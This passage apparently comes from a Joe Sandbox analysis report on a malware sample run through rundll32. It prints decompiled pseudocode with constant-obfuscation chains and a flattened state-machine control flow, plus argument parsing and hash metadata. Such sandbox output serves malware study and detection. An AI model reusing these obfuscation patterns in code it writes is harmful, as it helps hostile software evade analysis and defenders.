                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed short* _t381;
                                                                                                                      				signed int _t393;
                                                                                                                      				signed int* _t395;
                                                                                                                      				signed int _t397;
                                                                                                                      				signed int _t398;
                                                                                                                      				signed int _t399;
                                                                                                                      				signed int _t400;
                                                                                                                      				signed int _t401;
                                                                                                                      				signed int _t407;
                                                                                                                      				signed int* _t428;
                                                                                                                      				void* _t429;
                                                                                                                      				signed short* _t435;
                                                                                                                      				signed int* _t436;
                                                                                                                      
                                                                                                                      				_t436 =  &_v1720;
                                                                                                                      				_v1644 = 0xf4f2e5;
                                                                                                                      				_v1644 = _v1644 << 6;
                                                                                                                      				_t397 = 0x4a;
                                                                                                                      				_v1644 = _v1644 / _t397;
                                                                                                                      				_v1644 = _v1644 ^ 0x00d3d8d4;
                                                                                                                      				_t395 = 0;
                                                                                                                      				_v1660 = 0x8afd01;
                                                                                                                      				_t429 = 0xc405385;
                                                                                                                      				_v1660 = _v1660 | 0xf6dee043;
                                                                                                                      				_v1660 = _v1660 ^ 0x10b315be;
                                                                                                                      				_t398 = 0x45;
                                                                                                                      				_v1660 = _v1660 / _t398;
                                                                                                                      				_v1660 = _v1660 ^ 0x035da190;
                                                                                                                      				_v1692 = 0xc25321;
                                                                                                                      				_v1692 = _v1692 | 0x3e4ae4fc;
                                                                                                                      				_t399 = 0x12;
                                                                                                                      				_v1692 = _v1692 * 0x47;
                                                                                                                      				_v1692 = _v1692 ^ 0x6159278c;
                                                                                                                      				_v1692 = _v1692 ^ 0x0b15fa01;
                                                                                                                      				_v1572 = 0xf82306;
                                                                                                                      				_v1572 = _v1572 | 0xe3d21ea1;
                                                                                                                      				_v1572 = _v1572 ^ 0xe3f9e5ad;
                                                                                                                      				_v1676 = 0x48d4cb;
                                                                                                                      				_v1676 = _v1676 << 4;
                                                                                                                      				_v1676 = _v1676 + 0xffff2f85;
                                                                                                                      				_v1676 = _v1676 + 0x9649;
                                                                                                                      				_v1676 = _v1676 ^ 0x048c097a;
                                                                                                                      				_v1584 = 0x8f76c2;
                                                                                                                      				_v1584 = _v1584 * 0x1d;
                                                                                                                      				_v1584 = _v1584 ^ 0x10457475;
                                                                                                                      				_v1596 = 0xadf885;
                                                                                                                      				_v1596 = _v1596 ^ 0xa065608b;
                                                                                                                      				_v1596 = _v1596 ^ 0xa0c2245b;
                                                                                                                      				_v1684 = 0xeb1e45;
                                                                                                                      				_v1684 = _v1684 + 0x7cda;
                                                                                                                      				_v1684 = _v1684 / _t399;
                                                                                                                      				_v1684 = _v1684 + 0xffffa266;
                                                                                                                      				_v1684 = _v1684 ^ 0x0000adef;
                                                                                                                      				_v1632 = 0x65fdd9;
                                                                                                                      				_v1632 = _v1632 + 0xb49;
                                                                                                                      				_v1632 = _v1632 + 0xfffffa9d;
                                                                                                                      				_v1632 = _v1632 ^ 0x00600454;
                                                                                                                      				_v1716 = 0x9184ac;
                                                                                                                      				_v1716 = _v1716 + 0xffff0d2e;
                                                                                                                      				_v1716 = _v1716 | 0x6897691f;
                                                                                                                      				_v1716 = _v1716 ^ 0x2cb5e262;
                                                                                                                      				_v1716 = _v1716 ^ 0x442095be;
                                                                                                                      				_v1576 = 0x53941d;
                                                                                                                      				_v1576 = _v1576 >> 2;
                                                                                                                      				_v1576 = _v1576 ^ 0x001525d4;
                                                                                                                      				_v1640 = 0xd435ce;
                                                                                                                      				_v1640 = _v1640 + 0xffff1394;
                                                                                                                      				_v1640 = _v1640 + 0xffff8dc5;
                                                                                                                      				_v1640 = _v1640 ^ 0x00d594ec;
                                                                                                                      				_v1708 = 0x173594;
                                                                                                                      				_v1708 = _v1708 ^ 0xe44a87fe;
                                                                                                                      				_v1708 = _v1708 << 7;
                                                                                                                      				_v1708 = _v1708 + 0xee7d;
                                                                                                                      				_v1708 = _v1708 ^ 0x2ed8d8cc;
                                                                                                                      				_v1700 = 0x94f2ae;
                                                                                                                      				_v1700 = _v1700 << 3;
                                                                                                                      				_v1700 = _v1700 << 6;
                                                                                                                      				_v1700 = _v1700 * 0x58;
                                                                                                                      				_v1700 = _v1700 ^ 0x66d58e50;
                                                                                                                      				_v1604 = 0xd84545;
                                                                                                                      				_v1604 = _v1604 | 0x98cc5948;
                                                                                                                      				_v1604 = _v1604 ^ 0x98d8436e;
                                                                                                                      				_v1668 = 0xea4a2f;
                                                                                                                      				_v1668 = _v1668 + 0xf7bd;
                                                                                                                      				_v1668 = _v1668 >> 7;
                                                                                                                      				_v1668 = _v1668 ^ 0xf693418b;
                                                                                                                      				_v1668 = _v1668 ^ 0xf6966bd3;
                                                                                                                      				_v1580 = 0xa2c8e;
                                                                                                                      				_v1580 = _v1580 + 0x2944;
                                                                                                                      				_v1580 = _v1580 ^ 0x00011cb1;
                                                                                                                      				_v1720 = 0x34ce8d;
                                                                                                                      				_v1720 = _v1720 | 0xf5ffffea;
                                                                                                                      				_v1720 = _v1720 >> 9;
                                                                                                                      				_v1720 = _v1720 ^ 0x00732654;
                                                                                                                      				_v1564 = 0x8a9f58;
                                                                                                                      				_v1564 = _v1564 + 0x7c05;
                                                                                                                      				_v1564 = _v1564 ^ 0x008f283e;
                                                                                                                      				_v1588 = 0xa4f562;
                                                                                                                      				_v1588 = _v1588 ^ 0x7b7d16a6;
                                                                                                                      				_v1588 = _v1588 ^ 0x7bd14885;
                                                                                                                      				_v1704 = 0xee28fd;
                                                                                                                      				_v1704 = _v1704 + 0xffffe5b2;
                                                                                                                      				_v1704 = _v1704 + 0xffff824b;
                                                                                                                      				_v1704 = _v1704 + 0x581e;
                                                                                                                      				_v1704 = _v1704 ^ 0x00e0f0ab;
                                                                                                                      				_v1712 = 0x91da58;
                                                                                                                      				_v1712 = _v1712 << 3;
                                                                                                                      				_v1712 = _v1712 << 0xd;
                                                                                                                      				_v1712 = _v1712 ^ 0x485191fe;
                                                                                                                      				_v1712 = _v1712 ^ 0x920a86f0;
                                                                                                                      				_v1624 = 0xf1deea;
                                                                                                                      				_t400 = 3;
                                                                                                                      				_v1624 = _v1624 / _t400;
                                                                                                                      				_t401 = 0x38;
                                                                                                                      				_v1624 = _v1624 * 0x4f;
                                                                                                                      				_v1624 = _v1624 ^ 0x18ea6ffc;
                                                                                                                      				_v1680 = 0x898c63;
                                                                                                                      				_v1680 = _v1680 * 0x6a;
                                                                                                                      				_v1680 = _v1680 * 0x38;
                                                                                                                      				_v1680 = _v1680 | 0xa82efbb3;
                                                                                                                      				_v1680 = _v1680 ^ 0xfd6ff7e4;
                                                                                                                      				_v1688 = 0xae251e;
                                                                                                                      				_v1688 = _v1688 << 3;
                                                                                                                      				_v1688 = _v1688 >> 0xf;
                                                                                                                      				_v1688 = _v1688 + 0xb719;
                                                                                                                      				_v1688 = _v1688 ^ 0x000aff47;
                                                                                                                      				_v1696 = 0x40e656;
                                                                                                                      				_v1696 = _v1696 | 0x21fda4e6;
                                                                                                                      				_v1696 = _v1696 + 0xca7;
                                                                                                                      				_v1696 = _v1696 << 0xa;
                                                                                                                      				_v1696 = _v1696 ^ 0xf7c0cc6c;
                                                                                                                      				_v1652 = 0x8f24c5;
                                                                                                                      				_v1652 = _v1652 << 0xb;
                                                                                                                      				_v1652 = _v1652 ^ 0x5fc65761;
                                                                                                                      				_v1652 = _v1652 ^ 0x26eed855;
                                                                                                                      				_v1600 = 0xeb50f4;
                                                                                                                      				_v1600 = _v1600 | 0xe5f9ced2;
                                                                                                                      				_v1600 = _v1600 ^ 0xe5f6f1e5;
                                                                                                                      				_v1672 = 0x2ac6e7;
                                                                                                                      				_v1672 = _v1672 / _t401;
                                                                                                                      				_v1672 = _v1672 + 0xffffde53;
                                                                                                                      				_v1672 = _v1672 + 0xffff94e0;
                                                                                                                      				_v1672 = _v1672 ^ 0x000ac548;
                                                                                                                      				_v1648 = 0x7ee323;
                                                                                                                      				_v1648 = _v1648 ^ 0xc4404dab;
                                                                                                                      				_v1648 = _v1648 << 2;
                                                                                                                      				_v1648 = _v1648 ^ 0x10f162dd;
                                                                                                                      				_v1568 = 0xe6f77a;
                                                                                                                      				_v1568 = _v1568 | 0x9ec6220d;
                                                                                                                      				_v1568 = _v1568 ^ 0x9ee5ede4;
                                                                                                                      				_v1616 = 0x905f8c;
                                                                                                                      				_v1616 = _v1616 + 0xffff5c7c;
                                                                                                                      				_v1616 = _v1616 >> 2;
                                                                                                                      				_v1616 = _v1616 ^ 0x0024325f;
                                                                                                                      				_v1592 = 0xde4b6;
                                                                                                                      				_v1592 = _v1592 * 0x3f;
                                                                                                                      				_v1592 = _v1592 ^ 0x03679ec9;
                                                                                                                      				_v1664 = 0xe0cee4;
                                                                                                                      				_v1664 = _v1664 >> 2;
                                                                                                                      				_v1664 = _v1664 * 0x13;
                                                                                                                      				_v1664 = _v1664 * 0x71;
                                                                                                                      				_v1664 = _v1664 ^ 0xd75e35a6;
                                                                                                                      				_v1636 = 0x97f252;
                                                                                                                      				_v1636 = _v1636 | 0xcb237ae2;
                                                                                                                      				_v1636 = _v1636 << 0xf;
                                                                                                                      				_v1636 = _v1636 ^ 0xfd7df459;
                                                                                                                      				_v1656 = 0xc6c2a7;
                                                                                                                      				_v1656 = _v1656 + 0x66f2;
                                                                                                                      				_v1656 = _v1656 >> 0x10;
                                                                                                                      				_v1656 = _v1656 | 0xc8135773;
                                                                                                                      				_v1656 = _v1656 ^ 0xc81a6fdc;
                                                                                                                      				_v1608 = 0xd95490;
                                                                                                                      				_v1608 = _v1608 + 0xffff3702;
                                                                                                                      				_v1608 = _v1608 ^ 0x00d9a4ac;
                                                                                                                      				_v1612 = 0x2487c2;
                                                                                                                      				_t435 = _v1608;
                                                                                                                      				_v1612 = _v1612 * 0x77;
                                                                                                                      				_v1612 = _v1612 << 4;
                                                                                                                      				_v1612 = _v1612 ^ 0x0fb1a599;
                                                                                                                      				_v1620 = 0xa1030c;
                                                                                                                      				_v1620 = _v1620 >> 3;
                                                                                                                      				_v1620 = _v1620 << 0x10;
                                                                                                                      				_v1620 = _v1620 ^ 0x20685173;
                                                                                                                      				_v1628 = 0xb9794c;
                                                                                                                      				_v1628 = _v1628 >> 0xa;
                                                                                                                      				_v1628 = _v1628 >> 4;
                                                                                                                      				_v1628 = _v1628 ^ 0x0003794a;
                                                                                                                      				while(_t429 != 0x35deb36) {
                                                                                                                      					if(_t429 == 0x3b58d4d) {
                                                                                                                      						_push(_v1628);
                                                                                                                      						_push(_v1620);
                                                                                                                      						_push(_v1612);
                                                                                                                      						_push(_t395);
                                                                                                                      						_push(_t395);
                                                                                                                      						_push(_v1608);
                                                                                                                      						_push(_t401);
                                                                                                                      						_push(_t395);
                                                                                                                      						E00818B00(_t435, _v1656, __eflags);
                                                                                                                      						_t395 = 1;
                                                                                                                      						__eflags = 1;
                                                                                                                      						L23:
                                                                                                                      						return _t395;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0x7ac99d0) {
                                                                                                                      						_t381 = _t435;
                                                                                                                      						__eflags =  *_t435 - _t395;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							L18:
                                                                                                                      							_t429 = 0xe3616dc;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						do {
                                                                                                                      							L11:
                                                                                                                      							__eflags =  *_t381 - 0x2c;
                                                                                                                      							if( *_t381 != 0x2c) {
                                                                                                                      								goto L17;
                                                                                                                      							}
                                                                                                                      							_t428 =  &_v1560;
                                                                                                                      							while(1) {
                                                                                                                      								_t381 =  &(_t381[1]);
                                                                                                                      								_t407 =  *_t381 & 0x0000ffff;
                                                                                                                      								__eflags = _t407;
                                                                                                                      								if(_t407 == 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eflags = _t407 - 0x20;
                                                                                                                      								if(_t407 == 0x20) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								 *_t428 = _t407;
                                                                                                                      								_t428 =  &(_t428[0]);
                                                                                                                      								__eflags = _t428;
                                                                                                                      							}
                                                                                                                      							_t401 = 0;
                                                                                                                      							__eflags = 0;
                                                                                                                      							 *_t428 = 0;
                                                                                                                      							L17:
                                                                                                                      							_t381 =  &(_t381[1]);
                                                                                                                      							__eflags =  *_t381 - _t395;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L18;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0x94e99a1) {
                                                                                                                      						_push(_t401);
                                                                                                                      						E0081DE7B( &_v520, _v1580, _v1644, _t401, _v1720, _v1564, _v1588);
                                                                                                                      						E008306A8(_t401, _v1704, __eflags, _v1712, _v1624,  &_v1040);
                                                                                                                      						_push(_v1652);
                                                                                                                      						_push(_v1696);
                                                                                                                      						_push(0x100011dc);
                                                                                                                      						E0081DBCE(E00819F66(_v1680, _v1688, __eflags), __eflags, _v1600,  &_v520, _v1680, _v1672, _v1648, _v1568, _v1616,  &_v1040);
                                                                                                                      						_t401 = _v1592;
                                                                                                                      						E0081A203(_t401, _v1664, _v1636, _t385);
                                                                                                                      						_t436 =  &(_t436[0x17]);
                                                                                                                      						_t429 = 0x3b58d4d;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0xc405385) {
                                                                                                                      						_t401 = 0x208;
                                                                                                                      						E00830710(0x208,  &_v1560, _v1660, _v1692, _v1572, _v1676);
                                                                                                                      						_t436 =  &(_t436[4]);
                                                                                                                      						_t429 = 0x35deb36;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					_t445 = _t429 - 0xe3616dc;
                                                                                                                      					if(_t429 == 0xe3616dc) {
                                                                                                                      						_push(_v1716);
                                                                                                                      						_push(_v1632);
                                                                                                                      						_push(0x1000115c);
                                                                                                                      						_t393 = E0082F096(_v1576, _v1640, E00819F66(_v1596, _v1684, _t445), _v1708,  &_v1560);
                                                                                                                      						asm("sbb edi, edi");
                                                                                                                      						_t401 = _v1700;
                                                                                                                      						_t429 = ( ~_t393 & 0x02043081) + 0x74a6920;
                                                                                                                      						E0081A203(_t401, _v1604, _v1668, _t391);
                                                                                                                      						_t436 =  &(_t436[8]);
                                                                                                                      					}
                                                                                                                      					L20:
                                                                                                                      					if(_t429 != 0x74a6920) {
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L23;
                                                                                                                      				}
                                                                                                                      				_t435 = E0082D75A();
                                                                                                                      				_t429 = 0x7ac99d0;
                                                                                                                      				goto L20;
                                                                                                                      			}



























































                                                                                                                      0x008258c4
                                                                                                                      0x008256a6
                                                                                                                      0x00825827
                                                                                                                      0x00825829
                                                                                                                      0x0082582d
                                                                                                                      0x00825862
                                                                                                                      0x00825862
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0082582f
                                                                                                                      0x0082582f
                                                                                                                      0x0082582f
                                                                                                                      0x00825833
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00825835
                                                                                                                      0x0082584a
                                                                                                                      0x0082584a
                                                                                                                      0x0082584d
                                                                                                                      0x00825850
                                                                                                                      0x00825853
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0082583e
                                                                                                                      0x00825842
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00825844
                                                                                                                      0x00825847
                                                                                                                      0x00825847
                                                                                                                      0x00825847
                                                                                                                      0x00825855
                                                                                                                      0x00825855
                                                                                                                      0x00825857
                                                                                                                      0x0082585a
                                                                                                                      0x0082585a
                                                                                                                      0x0082585d
                                                                                                                      0x0082585d
                                                                                                                      0x00000000
                                                                                                                      0x0082582f
                                                                                                                      0x008256b2
                                                                                                                      0x00825768
                                                                                                                      0x0082578e
                                                                                                                      0x008257aa
                                                                                                                      0x008257af
                                                                                                                      0x008257b3
                                                                                                                      0x008257bf
                                                                                                                      0x008257fd
                                                                                                                      0x0082580e
                                                                                                                      0x00825815
                                                                                                                      0x0082581a
                                                                                                                      0x0082581d
                                                                                                                      0x00000000
                                                                                                                      0x0082581d
                                                                                                                      0x008256be
                                                                                                                      0x00825742
                                                                                                                      0x00825756
                                                                                                                      0x0082575b
                                                                                                                      0x0082575e
                                                                                                                      0x00000000
                                                                                                                      0x0082575e
                                                                                                                      0x008256c0
                                                                                                                      0x008256c6
                                                                                                                      0x008256cc
                                                                                                                      0x008256d0
                                                                                                                      0x008256df
                                                                                                                      0x00825703
                                                                                                                      0x00825718
                                                                                                                      0x0082571a
                                                                                                                      0x00825724
                                                                                                                      0x0082572a
                                                                                                                      0x0082572f
                                                                                                                      0x0082572f
                                                                                                                      0x0082587f
                                                                                                                      0x00825885
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0082588b
                                                                                                                      0x00825878
                                                                                                                      0x0082587a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #~$/J$D)$T&s$V@$_2$$sQh $}
                                                                                                                      • API String ID: 0-82791160
                                                                                                                      • Opcode ID: dff6f4005fd6e817e9f1b9ca32be9f3103c0861c073fd5ff970cd93cd86893d3
                                                                                                                      • Instruction ID: 204a7fdac1c1a384de4cafd47124a6cb3f6faf1026ecadc9a50c98ea166b60ce
                                                                                                                      • Opcode Fuzzy Hash: dff6f4005fd6e817e9f1b9ca32be9f3103c0861c073fd5ff970cd93cd86893d3
                                                                                                                      • Instruction Fuzzy Hash: 570223725093809FD3A8CF65C58A64BBBE1FBC5758F10891DF1EA8A260D7B08949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E00829829(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v2080;
                                                                                                                      				char _v2600;
                                                                                                                      				signed int _v2604;
                                                                                                                      				intOrPtr _v2608;
                                                                                                                      				intOrPtr _v2612;
                                                                                                                      				intOrPtr _v2616;
                                                                                                                      				signed int _v2620;
                                                                                                                      				signed int _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _v2776;
                                                                                                                      				signed int _v2780;
                                                                                                                      				signed int _v2784;
                                                                                                                      				signed int _v2788;
                                                                                                                      				signed int _v2792;
                                                                                                                      				signed int _t471;
                                                                                                                      				signed int _t488;
                                                                                                                      				signed int _t491;
                                                                                                                      				signed int _t492;
                                                                                                                      				signed int _t493;
                                                                                                                      				signed int _t494;
                                                                                                                      				signed int _t495;
                                                                                                                      				signed int _t496;
                                                                                                                      				signed int _t497;
                                                                                                                      				signed int _t498;
                                                                                                                      				signed int _t499;
                                                                                                                      				signed int _t500;
                                                                                                                      				signed int _t503;
                                                                                                                      				void* _t552;
                                                                                                                      				void* _t553;
                                                                                                                      				signed int _t556;
                                                                                                                      				signed int* _t558;
                                                                                                                      
                                                                                                                      				_t558 =  &_v2792;
                                                                                                                      				_v2604 = _v2604 & 0x00000000;
                                                                                                                      				_v2616 = 0xa4b63e;
                                                                                                                      				_v2612 = 0x1047f0;
                                                                                                                      				_v2608 = 0x380de4;
                                                                                                                      				_v2640 = 0x3665dd;
                                                                                                                      				_v2640 = _v2640 >> 1;
                                                                                                                      				_v2640 = _v2640 ^ 0x001b32c7;
                                                                                                                      				_v2748 = 0xd91e11;
                                                                                                                      				_v2748 = _v2748 + 0xffffc541;
                                                                                                                      				_v2748 = _v2748 ^ 0x51c605c4;
                                                                                                                      				_v2748 = _v2748 ^ 0x6a8dd901;
                                                                                                                      				_v2748 = _v2748 ^ 0x3b9e7a9b;
                                                                                                                      				_v2788 = 0x157b94;
                                                                                                                      				_v2788 = _v2788 + 0xffffeadc;
                                                                                                                      				_v2788 = _v2788 >> 0x10;
                                                                                                                      				_v2788 = _v2788 + 0xffff73d6;
                                                                                                                      				_v2788 = _v2788 ^ 0xffff2eba;
                                                                                                                      				_v2716 = 0x64154b;
                                                                                                                      				_v2716 = _v2716 * 0x75;
                                                                                                                      				_t552 = __ecx;
                                                                                                                      				_v2716 = _v2716 << 3;
                                                                                                                      				_t553 = 0x422d362;
                                                                                                                      				_v2716 = _v2716 ^ 0x6de46b99;
                                                                                                                      				_v2720 = 0x9c58cd;
                                                                                                                      				_v2720 = _v2720 + 0xffff09d2;
                                                                                                                      				_v2720 = _v2720 + 0x2545;
                                                                                                                      				_v2720 = _v2720 ^ 0x00913431;
                                                                                                                      				_v2688 = 0xaeb597;
                                                                                                                      				_v2688 = _v2688 ^ 0x90c85188;
                                                                                                                      				_t556 = 0x69;
                                                                                                                      				_v2688 = _v2688 / _t556;
                                                                                                                      				_v2688 = _v2688 ^ 0x016f083f;
                                                                                                                      				_v2624 = 0xf336a7;
                                                                                                                      				_v2624 = _v2624 ^ 0x0756d720;
                                                                                                                      				_v2624 = _v2624 ^ 0x07af532c;
                                                                                                                      				_v2780 = 0x2eb910;
                                                                                                                      				_v2780 = _v2780 + 0xffff6a34;
                                                                                                                      				_v2780 = _v2780 + 0x3a3b;
                                                                                                                      				_v2780 = _v2780 >> 0xc;
                                                                                                                      				_v2780 = _v2780 ^ 0x00093eda;
                                                                                                                      				_v2696 = 0x95c01d;
                                                                                                                      				_v2696 = _v2696 ^ 0xd4af9b47;
                                                                                                                      				_t488 = 0x43;
                                                                                                                      				_v2696 = _v2696 * 0x38;
                                                                                                                      				_v2696 = _v2696 ^ 0x6cc3512a;
                                                                                                                      				_v2756 = 0x7bda8f;
                                                                                                                      				_v2756 = _v2756 >> 4;
                                                                                                                      				_v2756 = _v2756 + 0xffff790e;
                                                                                                                      				_v2756 = _v2756 << 1;
                                                                                                                      				_v2756 = _v2756 ^ 0x00077f92;
                                                                                                                      				_v2672 = 0xbe500a;
                                                                                                                      				_v2672 = _v2672 * 0x69;
                                                                                                                      				_v2672 = _v2672 ^ 0x4e081773;
                                                                                                                      				_v2664 = 0xf21545;
                                                                                                                      				_v2664 = _v2664 << 1;
                                                                                                                      				_v2664 = _v2664 ^ 0x01e0a5ee;
                                                                                                                      				_v2712 = 0x4aa3d0;
                                                                                                                      				_v2712 = _v2712 / _t488;
                                                                                                                      				_v2712 = _v2712 + 0xffffba00;
                                                                                                                      				_v2712 = _v2712 ^ 0x00096837;
                                                                                                                      				_v2704 = 0x6e8851;
                                                                                                                      				_v2704 = _v2704 * 0x4c;
                                                                                                                      				_v2704 = _v2704 ^ 0x74892048;
                                                                                                                      				_v2704 = _v2704 ^ 0x54501412;
                                                                                                                      				_v2740 = 0x9704ff;
                                                                                                                      				_t491 = 0x4c;
                                                                                                                      				_v2740 = _v2740 / _t491;
                                                                                                                      				_v2740 = _v2740 + 0xffff50cb;
                                                                                                                      				_v2740 = _v2740 / _t556;
                                                                                                                      				_v2740 = _v2740 ^ 0x0004486b;
                                                                                                                      				_v2772 = 0xa165e2;
                                                                                                                      				_t492 = 0x36;
                                                                                                                      				_v2772 = _v2772 / _t492;
                                                                                                                      				_v2772 = _v2772 ^ 0x6089554b;
                                                                                                                      				_t493 = 0x29;
                                                                                                                      				_v2772 = _v2772 * 0x30;
                                                                                                                      				_v2772 = _v2772 ^ 0x1a2b5067;
                                                                                                                      				_v2680 = 0xe9519d;
                                                                                                                      				_v2680 = _v2680 / _t493;
                                                                                                                      				_v2680 = _v2680 | 0xd8f73a5a;
                                                                                                                      				_v2680 = _v2680 ^ 0xd8f0b3ca;
                                                                                                                      				_v2656 = 0x3fe983;
                                                                                                                      				_t494 = 0x30;
                                                                                                                      				_v2656 = _v2656 / _t494;
                                                                                                                      				_v2656 = _v2656 ^ 0x00046ac2;
                                                                                                                      				_v2628 = 0x33b4cd;
                                                                                                                      				_t495 = 0x11;
                                                                                                                      				_v2628 = _v2628 / _t495;
                                                                                                                      				_v2628 = _v2628 ^ 0x00043067;
                                                                                                                      				_v2648 = 0x47920b;
                                                                                                                      				_t496 = 0x1a;
                                                                                                                      				_v2648 = _v2648 * 7;
                                                                                                                      				_v2648 = _v2648 ^ 0x01f55662;
                                                                                                                      				_v2636 = 0xc27dad;
                                                                                                                      				_v2636 = _v2636 | 0xeea2905e;
                                                                                                                      				_v2636 = _v2636 ^ 0xeee70f52;
                                                                                                                      				_v2792 = 0xce83a7;
                                                                                                                      				_v2792 = _v2792 | 0x91097b86;
                                                                                                                      				_v2792 = _v2792 >> 0x10;
                                                                                                                      				_v2792 = _v2792 + 0xfffff873;
                                                                                                                      				_v2792 = _v2792 ^ 0x000d88b9;
                                                                                                                      				_v2764 = 0x687458;
                                                                                                                      				_v2764 = _v2764 + 0xffff3130;
                                                                                                                      				_v2764 = _v2764 / _t488;
                                                                                                                      				_v2764 = _v2764 | 0xf90624cd;
                                                                                                                      				_v2764 = _v2764 ^ 0xf90653f7;
                                                                                                                      				_v2784 = 0xf92951;
                                                                                                                      				_v2784 = _v2784 + 0xffff51be;
                                                                                                                      				_v2784 = _v2784 ^ 0x8ae9764d;
                                                                                                                      				_v2784 = _v2784 + 0x99a0;
                                                                                                                      				_v2784 = _v2784 ^ 0x8a16d001;
                                                                                                                      				_v2732 = 0xd5993f;
                                                                                                                      				_v2732 = _v2732 / _t496;
                                                                                                                      				_v2732 = _v2732 + 0xffff4990;
                                                                                                                      				_v2732 = _v2732 ^ 0x000978e2;
                                                                                                                      				_v2724 = 0xcf1521;
                                                                                                                      				_v2724 = _v2724 >> 2;
                                                                                                                      				_v2724 = _v2724 << 0xa;
                                                                                                                      				_v2724 = _v2724 ^ 0xcf1adb57;
                                                                                                                      				_v2728 = 0xc9d07f;
                                                                                                                      				_v2728 = _v2728 + 0xffff241f;
                                                                                                                      				_v2728 = _v2728 + 0xffff5e1a;
                                                                                                                      				_v2728 = _v2728 ^ 0x00c03f16;
                                                                                                                      				_v2632 = 0x51b7a0;
                                                                                                                      				_t497 = 0xd;
                                                                                                                      				_v2632 = _v2632 / _t497;
                                                                                                                      				_v2632 = _v2632 ^ 0x0003c006;
                                                                                                                      				_v2768 = 0xdee1c4;
                                                                                                                      				_t498 = 0x72;
                                                                                                                      				_v2768 = _v2768 * 0x4b;
                                                                                                                      				_v2768 = _v2768 ^ 0x45bd8e4b;
                                                                                                                      				_v2768 = _v2768 + 0x810;
                                                                                                                      				_v2768 = _v2768 ^ 0x04f5c4f4;
                                                                                                                      				_v2620 = 0x673f5;
                                                                                                                      				_v2620 = _v2620 / _t498;
                                                                                                                      				_v2620 = _v2620 ^ 0x0006a8dc;
                                                                                                                      				_v2776 = 0xc1ae10;
                                                                                                                      				_t499 = 0x5a;
                                                                                                                      				_v2776 = _v2776 * 0x5d;
                                                                                                                      				_v2776 = _v2776 / _t499;
                                                                                                                      				_t500 = 0x7a;
                                                                                                                      				_v2776 = _v2776 / _t500;
                                                                                                                      				_v2776 = _v2776 ^ 0x0000f358;
                                                                                                                      				_v2668 = 0x9bfbd0;
                                                                                                                      				_v2668 = _v2668 * 0x2e;
                                                                                                                      				_v2668 = _v2668 ^ 0x1c042184;
                                                                                                                      				_v2700 = 0xcd0c2b;
                                                                                                                      				_v2700 = _v2700 >> 8;
                                                                                                                      				_v2700 = _v2700 + 0xfffff064;
                                                                                                                      				_v2700 = _v2700 ^ 0x0007642a;
                                                                                                                      				_v2708 = 0x1a6cb4;
                                                                                                                      				_v2708 = _v2708 ^ 0x57f593cf;
                                                                                                                      				_v2708 = _v2708 | 0x44881231;
                                                                                                                      				_v2708 = _v2708 ^ 0x57eba098;
                                                                                                                      				_v2752 = 0xd7110a;
                                                                                                                      				_v2752 = _v2752 / _t556;
                                                                                                                      				_v2752 = _v2752 << 0xe;
                                                                                                                      				_v2752 = _v2752 + 0xffff1365;
